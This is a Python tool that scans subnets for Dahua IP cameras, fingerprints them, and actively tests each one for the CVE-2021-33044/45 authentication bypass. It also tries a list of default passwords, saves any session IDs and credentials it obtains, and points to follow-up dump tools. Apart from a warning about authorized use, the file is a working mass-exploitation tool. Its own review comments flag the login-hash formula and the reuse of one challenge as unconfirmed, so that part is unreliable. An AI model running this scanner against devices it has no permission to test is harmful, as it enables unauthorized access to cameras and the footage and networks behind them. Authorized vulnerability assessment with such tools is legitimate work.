#!/usr/bin/env python3
"""
Dahua IP Camera Network Scanner
================================
CVE-2021-33044 / CVE-2021-33045 Auto-Detection

Scans a subnet (or single host) for Dahua cameras, fingerprints them via
RPC2 and CGI endpoints, checks for authentication bypass vulnerabilities,
and prints a structured summary table.

WARNING: For authorized security testing and educational purposes only.
         Do not use against devices without explicit permission.

Usage:
    python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081
    python dahua_scanner.py 192.168.1.100:8081
    python dahua_scanner.py 192.168.1.0/24 -p 80 8000 8080 -w 100 -o results.json

Output:
    - Live progress per host
    - ASCII table of discovered cameras
    - Optional JSON output with full details
"""

import argparse
import concurrent.futures
import hashlib
import ipaddress
import json
import socket
import sys
import threading
import time
from datetime import datetime

import requests

# Every request in this file is sent with verify=False, so silence the
# per-request InsecureRequestWarning that urllib3 would otherwise print.
requests.packages.urllib3.disable_warnings()

# ---------------------------------------------------------------------------
# Defaults
# ---------------------------------------------------------------------------
COMMON_PORTS = [80, 8000, 8080, 8081, 8888, 9000, 443, 37777]  # Suggestion only
DEFAULT_THREADS = 50
DEFAULT_TIMEOUT = 5

# Substrings searched for (case-insensitively) in a host's landing page.
DAHUA_SIGNATURES = [
    "dahua", "DH-IPC", "IPC-HDBW", "IPC-HDW", "IPC-HUM",
    "/doc/page/login.asp", "NetVideoActiveX", "RPC2_Login",
    "loginPage", "NVR", "XVR", "DahuaWeb",
]

# (user, password) pairs tried by the default-credential check.
DEFAULT_CREDS = [
    ("admin", ""),
    ("admin", "admin"),
    ("admin", "888888"),
    ("admin", "666666"),
    ("admin", "123456"),
    ("666666", "666666"),
    ("888888", "888888"),
]


# ---------------------------------------------------------------------------
# RPC2 helpers
# ---------------------------------------------------------------------------
def rpc2_challenge(target, port, timeout, http=None):
    """Request a login challenge from ``/RPC2_Login`` on *target*:*port*.

    Sends a ``global.login`` call for user ``admin`` with an empty password
    and reads the challenge fields from the JSON reply.

    Args:
        target: Host name or IP address of the device.
        port: TCP port of the web interface; HTTPS is used on 443, plain
            HTTP on every other port.
        timeout: Request timeout in seconds.
        http: Optional object with a ``post`` method (e.g. a
            ``requests.Session``); the ``requests`` module is used when
            omitted.

    Returns:
        A ``(realm, random, session)`` tuple.  Fields missing from the reply
        default to ``""``, ``""`` and ``0``.  ``(None, None, 0)`` is returned
        when the request fails or the reply is not the expected JSON object.
    """
    scheme = "https" if port == 443 else "http"
    url = f"{scheme}://{target}:{port}/RPC2_Login"
    payload = {
        "method": "global.login",
        "params": {
            "userName": "admin",
            "password": "",
            "clientType": "Web3.0",
            "loginType": "Direct",
            "authorityType": "Default",
            "passwordType": "Default",
        },
        "id": 1,
        "session": 0,
    }
    try:
        r = (http or requests).post(url, json=payload, timeout=timeout, verify=False)
        data = r.json()
    except Exception:
        # Best-effort probe: an unreachable host or a non-JSON reply simply
        # means "no challenge available".
        return None, None, 0

    if not isinstance(data, dict):
        return None, None, 0
    params = data.get("params", {})
    if not isinstance(params, dict):
        return None, None, 0
    return params.get("realm", ""), params.get("random", ""), data.get("session", 0)
def _md5hash(s):
    """Return the upper-case hexadecimal MD5 digest of the string *s*."""
    return hashlib.md5(s.encode()).hexdigest().upper()


def bypass_hash(user, realm, rnd):
    """CVE-2021-33044/45: empty-password step1.

    Produces the same value as ``legit_hash(user, "", realm, rnd)``.
    """
    return legit_hash(user, "", realm, rnd)


def legit_hash(user, pw, realm, rnd):
    """Return the two-step MD5 login hash for *user* / *pw*.

    Step 1 hashes ``user:realm:pw``; step 2 hashes ``s1:rnd:s1`` where ``s1``
    is the step-1 digest.

    NOTE(review): other RPC2 clients are believed to compute step 2 as
    ``user:rnd:s1`` - confirm the ``s1:rnd:s1`` form against a real device.
    """
    s1 = _md5hash(f"{user}:{realm}:{pw}")
    return _md5hash(f"{s1}:{rnd}:{s1}")


def _base_url(host, port):
    """Return the base URL for *host*:*port* (HTTPS on 443, HTTP otherwise)."""
    scheme = "https" if port == 443 else "http"
    return f"{scheme}://{host}:{port}"


def rpc2_login(target, port, user, pw_hash, session, timeout, http=None):
    """Send the second ``global.login`` step and return the decoded reply.

    Args:
        target: Host name or IP address of the device.
        port: TCP port of the web interface.
        user: User name to log in as.
        pw_hash: Password hash computed from the challenge.
        session: Session id obtained from the challenge reply.
        timeout: Request timeout in seconds.
        http: Optional object with a ``post`` method (e.g. a
            ``requests.Session``); the ``requests`` module is used when
            omitted.

    Returns:
        The reply as a dict, or ``{}`` when the request fails or the reply is
        not a JSON object (so callers can always use ``.get``).
    """
    payload = {
        "method": "global.login",
        "params": {
            "userName": user,
            "password": pw_hash,
            "clientType": "Web3.0",
            "loginType": "Direct",
            "authorityType": "Default",
            "passwordType": "Default",
        },
        "id": 2,
        "session": session,
    }
    try:
        r = (http or requests).post(f"{_base_url(target, port)}/RPC2_Login",
                                    json=payload, timeout=timeout, verify=False)
        data = r.json()
    except Exception:
        # Best-effort: connection errors and non-JSON replies count as failure.
        return {}
    return data if isinstance(data, dict) else {}


# ---------------------------------------------------------------------------
# Detection & fingerprinting
# ---------------------------------------------------------------------------
def port_open(ip, port, timeout):
    """Return True if a TCP connection to *ip*:*port* succeeds within *timeout*."""
    try:
        # The context manager closes the socket even if connect_ex raises.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            return s.connect_ex((str(ip), port)) == 0
    except (OSError, OverflowError, ValueError):
        # Resolution failures, out-of-range ports, bad timeouts: not open.
        return False


def is_dahua(ip, port, timeout):
    """Return True if HTTP response contains any Dahua signature.

    Two probes are made: a GET of ``/`` whose body and ``Server`` header are
    searched for known markers, then a POST to ``/RPC2_Login`` whose reply is
    checked for a ``params.realm`` field.
    """
    base = _base_url(ip, port)
    try:
        r = requests.get(f"{base}/", timeout=timeout, verify=False,
                         allow_redirects=True)
        body_low = r.text.lower()
        if any(sig.lower() in body_low for sig in DAHUA_SIGNATURES):
            return True
        server = r.headers.get("Server", "").lower()
        if "dahua" in server or "netsurveillance" in server:
            return True
    except Exception:
        pass  # best-effort probe; fall through to the RPC2 check

    # Try RPC2 endpoint - Dahua-specific
    try:
        r = requests.post(f"{base}/RPC2_Login",
                          json={"method": "global.login",
                                "params": {"userName": "x", "password": "",
                                           "clientType": "Web3.0",
                                           "authorityType": "Default",
                                           "passwordType": "Default"},
                                "id": 1},
                          timeout=timeout, verify=False)
        data = r.json()
    except Exception:
        return False

    # Dahua always returns params.realm and params.random on step-1
    params = data.get("params", {}) if isinstance(data, dict) else None
    return isinstance(params, dict) and "realm" in params


def _magicbox_query(base, action, timeout, limit):
    """Return the single-line reply of a ``magicBox.cgi`` action, or None.

    A reply is accepted only with HTTP status 200, a non-blank body and no
    ``401`` anywhere in the body.  Whitespace runs are collapsed so a
    multi-line reply cannot break the summary table; the result is cut to
    *limit* characters.
    """
    try:
        r = requests.get(f"{base}/cgi-bin/magicBox.cgi?action={action}",
                         timeout=timeout, verify=False)
        text = r.text
    except Exception:
        return None
    if r.status_code != 200 or not text.strip() or "401" in text:
        return None
    return " ".join(text.split())[:limit]


def fingerprint(ip, port, timeout):
    """Pull device type and firmware version via CGI or HTTP headers.

    Returns:
        A dict with keys ``model``, ``firmware``, ``serial`` (each
        ``"Unknown"`` when it could not be read) and ``device_id`` (``""``
        when unknown).
    """
    base = _base_url(ip, port)
    result = {"model": "Unknown", "firmware": "Unknown",
              "serial": "Unknown", "device_id": ""}

    # Try CGI endpoints (requires auth on most devices)
    for key, action, limit in (("model", "getDeviceType", 50),
                               ("firmware", "getSoftwareVersion", 50),
                               ("serial", "getSerialNo", 30)):
        value = _magicbox_query(base, action, timeout, limit)
        if value:
            result[key] = value

    # Fallback: extract device_id from RPC2 realm + firmware date from headers
    if result["model"] == "Unknown" or result["firmware"] == "Unknown":
        if result["firmware"] == "Unknown":
            try:
                # Get firmware date from Last-Modified header
                r = requests.get(f"{base}/", timeout=timeout, verify=False)
                last_mod = r.headers.get("Last-Modified", "")
                if last_mod:
                    result["firmware"] = f"~{last_mod[:16]}"
            except Exception:
                pass  # best-effort

        try:
            # Get device ID from RPC2 realm
            r = requests.post(f"{base}/RPC2_Login", json={
                "method": "global.login",
                "params": {"userName": "x", "password": "",
                           "clientType": "Web3.0", "loginType": "Direct",
                           "authorityType": "Default",
                           "passwordType": "Default"},
                "id": 1, "session": 0
            }, timeout=timeout, verify=False)
            data = r.json()
            realm = data.get("params", {}).get("realm", "")
            # Whatever follows "Login to " in the realm is used as device id.
            if "Login to " in realm:
                result["device_id"] = realm.split("Login to ")[1][:32]
                if result["model"] == "Unknown":
                    result["model"] = f"Dahua-{result['device_id'][:8]}"
        except Exception:
            pass  # best-effort

    return result


# ---------------------------------------------------------------------------
# Vulnerability checks
# ---------------------------------------------------------------------------
def check_bypass(ip, port, timeout):
    """CVE-2021-33044/45: returns session_id if vulnerable, else None.

    ``"UNKNOWN"`` is returned when the login succeeds but the reply carries
    no usable session id, so a positive result is never reported as falsy.
    """
    with requests.Session() as http:  # closed on exit; was leaked before
        http.verify = False
        realm, rnd, sess = rpc2_challenge(ip, port, timeout, http=http)
        if not realm:
            return None
        resp = rpc2_login(ip, port, "admin", bypass_hash("admin", realm, rnd),
                          sess, timeout, http=http)
    if resp.get("result") is True:
        return resp.get("session") or "UNKNOWN"
    return None


def check_default_creds(ip, port, timeout):
    """Returns (user, pass, session) of first matching default cred, or None.

    NOTE(review): one challenge is reused for every attempt - confirm that
    devices accept this after a failed login.
    """
    with requests.Session() as http:  # closed on exit; was leaked before
        http.verify = False
        realm, rnd, sess = rpc2_challenge(ip, port, timeout, http=http)
        if not realm:
            return None
        for user, pw in DEFAULT_CREDS:
            resp = rpc2_login(ip, port, user, legit_hash(user, pw, realm, rnd),
                              sess, timeout, http=http)
            if resp.get("result") is True:
                return user, pw, resp.get("session")
    return None


# ---------------------------------------------------------------------------
# Per-host scan
# ---------------------------------------------------------------------------
def scan_host(ip, ports, timeout, verbose):
    """Scan *ip* on each of *ports* and describe the first Dahua device found.

    Args:
        ip: Address to scan (anything ``str()`` turns into a host string).
        ports: Iterable of TCP ports, tried in order.
        timeout: Per-connection timeout in seconds.
        verbose: When true, print a one-line summary for a discovered device.

    Returns:
        A camera dict (``ip``, ``port``, ``model``, ``firmware``, ``serial``,
        ``device_id``, ``bypass``, ``default``, ``cves``) for the first port
        that answers like a Dahua device, or None if no port does.
    """
    ip = str(ip)
    for port in ports:
        if not port_open(ip, port, timeout):
            continue
        if not is_dahua(ip, port, timeout):
            continue

        # Found a Dahua device - gather full info
        info = fingerprint(ip, port, timeout)
        camera = {
            "ip": ip,
            "port": port,
            "model": info["model"],
            "firmware": info["firmware"],
            "serial": info["serial"],
            "device_id": info.get("device_id", ""),
            "bypass": None,   # session_id or None
            "default": None,  # (user, pass, session) or None
            "cves": [],
        }

        session = check_bypass(ip, port, timeout)
        if session:
            camera["bypass"] = session
            camera["cves"].append("CVE-2021-33044/45")

        cred = check_default_creds(ip, port, timeout)
        if cred:
            camera["default"] = cred

        if verbose:
            vuln = ", ".join(camera["cves"]) if camera["cves"] else "none detected"
            print(f" [+] {ip}:{port} model={camera['model']} fw={camera['firmware']} vulns={vuln}")

        return camera
    return None


# ---------------------------------------------------------------------------
# Network scan
# ---------------------------------------------------------------------------
def scan_network(network, ports, threads, timeout, verbose):
    """Scan every host in *network* concurrently and return the cameras found.

    Args:
        network: CIDR subnet, single IP, or ``ip:port`` (the port part is
            ignored here).
        ports: Ports handed to ``scan_host`` for every address.
        threads: Size of the worker thread pool (values below 1 are
            treated as 1).
        timeout: Per-connection timeout in seconds.
        verbose: When false, a progress bar is drawn; when true, per-host
            output is left to ``scan_host`` and scan errors go to stderr.

    Returns:
        List of camera dicts, in completion order.

    Exits the process with status 1 if *network* is not a valid target.
    """
    try:
        net = ipaddress.ip_network(network, strict=False)
    except ValueError:
        # Single IP (strip port if given as ip:port - port already in ports list)
        host = network.split(":")[0] if ":" in network and "/" not in network else network
        try:
            hosts = [ipaddress.ip_address(host)]
        except ValueError:
            print(f"[-] Invalid target: {network}", file=sys.stderr)
            sys.exit(1)
    else:
        # A /31 or /32 has no separate network/broadcast address, so every
        # address in it is a scan target (previously a /31 lost one host).
        hosts = list(net) if net.num_addresses <= 2 else list(net.hosts())

    total = len(hosts)
    lock = threading.Lock()
    found = []
    scanned = 0

    def worker(ip):
        nonlocal scanned
        try:
            result = scan_host(ip, ports, timeout, verbose)
        except Exception as exc:
            # One misbehaving host must not abort the scan or stall the
            # progress counter.
            result = None
            if verbose:
                print(f" [-] {ip}: scan error: {exc}", file=sys.stderr)
        with lock:
            scanned += 1
            if result:
                found.append(result)
            if not verbose:
                pct = int(scanned / total * 40)
                bar = "#" * pct + "." * (40 - pct)
                print(f"\r [{bar}] {scanned}/{total}", end="", flush=True)

    with concurrent.futures.ThreadPoolExecutor(max_workers=max(1, threads)) as ex:
        # Drain the iterator so every task has run before we report.
        for _ in ex.map(worker, hosts):
            pass

    if not verbose:
        print()  # newline after progress bar
    return found


# ---------------------------------------------------------------------------
# Output
# ---------------------------------------------------------------------------
def print_banner(network, ports, threads, timeout):
    """Print the scan header: target, ports, thread count, timeout, start time."""
    print("""
 Dahua Camera Network Scanner
 CVE-2021-33044 / CVE-2021-33045 auto-check
""")
    print(f" Target : {network}")
    print(f" Ports : {ports}")
    print(f" Threads : {threads} Timeout: {timeout}s")
    print(f" Started : {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")


def print_table(cameras):
    """Print an ASCII table of *cameras* followed by per-device findings.

    Every column, including VULNERABILITIES, is sized to its widest cell so
    the borders stay aligned.
    """
    if not cameras:
        print("\n [-] No Dahua cameras found.\n")
        return

    # Build the vulnerability cell first so its width can size the column.
    vuln_cells = []
    for c in cameras:
        vuln_parts = list(c["cves"])
        if c["default"]:
            vuln_parts.append(f"creds:{c['default'][0]}:{c['default'][1]!r}")
        vuln_cells.append(", ".join(vuln_parts) if vuln_parts else "none")

    col_ip = max(9, max(len(c["ip"]) for c in cameras))
    col_port = max(4, max(len(str(c["port"])) for c in cameras))
    col_mod = max(8, max(len(c["model"]) for c in cameras))
    col_fw = max(8, max(len(c["firmware"]) for c in cameras))
    col_vuln = max(24, max(len(cell) for cell in vuln_cells))

    sep = (f" +-{'-'*col_ip}-+-{'-'*col_port}-+-{'-'*col_mod}-+-"
           f"{'-'*col_fw}-+-{'-'*col_vuln}-+")
    hdr = (f" | {'IP':<{col_ip}} | {'PORT':<{col_port}} | {'MODEL':<{col_mod}} | "
           f"{'FIRMWARE':<{col_fw}} | {'VULNERABILITIES':<{col_vuln}} |")

    print(f"\n Found {len(cameras)} Dahua camera(s):\n")
    print(sep)
    print(hdr)
    print(sep)
    for c, vuln_str in zip(cameras, vuln_cells):
        print(f" | {c['ip']:<{col_ip}} | {c['port']:<{col_port}} | "
              f"{c['model']:<{col_mod}} | {c['firmware']:<{col_fw}} | "
              f"{vuln_str:<{col_vuln}} |")
    print(sep)

    # Highlight critical findings
    print()
    for c in cameras:
        if c["bypass"]:
            print(f" [!!!] BYPASS VULN {c['ip']}:{c['port']} session={c['bypass']}")
            print(f" -> python dahua_auth_bypass.py {c['ip']} -p {c['port']} --dump")
        elif c["default"]:
            u, p, _ = c["default"]
            print(f" [!] DEFAULT CREDS {c['ip']}:{c['port']} {u}:{p!r}")
            print(f" -> python dahua_auth_bypass.py {c['ip']} -p {c['port']} --dump")
        else:
            print(f" [i] {c['ip']}:{c['port']} no auth issues (run full scan: python dahua_exploit.py {c['ip']})")
    print()


def save_json(cameras, path):
    """Write *cameras* to *path* as JSON under ``cameras``, with a ``scan_time``.

    The ``default`` credential tuple of each camera is expanded into a
    ``{"user", "pass", "session"}`` object; the input dicts are not modified.
    """
    out = []
    for c in cameras:
        row = dict(c)
        if row["default"]:
            user, password, session = row["default"]
            row["default"] = {"user": user, "pass": password, "session": session}
        out.append(row)
    with open(path, "w", encoding="utf-8") as f:
        json.dump({"scan_time": datetime.now().isoformat(), "cameras": out},
                  f, indent=2)
    print(f" [+] Results saved {path}")


# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
def main():
    """Parse the command line, run the scan, print and optionally save results.

    Exit status is 0 when at least one camera was found and 1 otherwise
    (including when no ports were given); argparse usage errors exit with 2.
    """
    parser = argparse.ArgumentParser(
        description="Dahua IP Camera Network Scanner - CVE-2021-33044/33045 Detection",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=f"""
Examples:
  python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081
  python dahua_scanner.py 192.168.1.100:8081
  python dahua_scanner.py 192.168.1.0/24 -p 80 8000 8080 -w 100 -v
  python dahua_scanner.py 10.0.0.0/24 -p 80 443 8080 -o results.json

Common Dahua ports: {COMMON_PORTS}

WARNING: For authorized security testing only. Do not use without permission.
"""
    )
    parser.add_argument("network",
                        help="Subnet (192.168.1.0/24) or single IP (192.168.1.1:8081)")
    parser.add_argument("-p", "--ports", nargs="+", type=int, default=None,
                        help=f"Ports to scan (required unless using IP:port format). Common: {COMMON_PORTS}")
    parser.add_argument("-w", "--threads", type=int, default=DEFAULT_THREADS,
                        help=f"Concurrent threads (default: {DEFAULT_THREADS})")
    parser.add_argument("-t", "--timeout", type=int, default=DEFAULT_TIMEOUT,
                        help=f"Per-connection timeout in seconds (default: {DEFAULT_TIMEOUT})")
    parser.add_argument("-o", "--output", help="Save results to JSON file")
    parser.add_argument("-v", "--verbose", action="store_true",
                        help="Print each camera as discovered (instead of progress bar)")
    args = parser.parse_args()

    if args.threads < 1:
        parser.error("--threads must be at least 1")
    if args.timeout <= 0:
        # A zero timeout makes the socket non-blocking, so no port would
        # ever be reported open.
        parser.error("--timeout must be greater than 0")

    # Support host:port shorthand: dahua_scanner.py 192.168.1.1:8081
    if ":" in args.network and "/" not in args.network:
        host, port_str = args.network.rsplit(":", 1)
        try:
            extra_port = int(port_str)
        except ValueError:
            pass  # not a port; scan_network validates the target itself
        else:
            args.network = host
            if args.ports is None:
                args.ports = [extra_port]
            elif extra_port not in args.ports:
                args.ports = [extra_port] + args.ports

    # Require ports to be specified
    if args.ports is None:
        print("\n [!] ERROR: No ports specified.")
        print(" [i] Use -p to specify ports, e.g.: -p 80 8080 8081")
        print(" [i] Or use IP:port format, e.g.: 192.168.1.100:8081")
        print(f" [i] Common Dahua ports: {COMMON_PORTS}")
        print("\n Run with --help for full usage.\n")
        sys.exit(1)

    bad_ports = [p for p in args.ports if not 1 <= p <= 65535]
    if bad_ports:
        parser.error(f"port(s) out of range 1-65535: {bad_ports}")

    print_banner(args.network, args.ports, args.threads, args.timeout)

    t0 = time.monotonic()  # monotonic: unaffected by system clock changes
    cameras = scan_network(args.network, args.ports, args.threads,
                           args.timeout, args.verbose)
    elapsed = time.monotonic() - t0

    print_table(cameras)
    print(f" Scan finished in {elapsed:.1f}s")

    if args.output:
        save_json(cameras, args.output)

    sys.exit(0 if cameras else 1)


if __name__ == "__main__":
    main()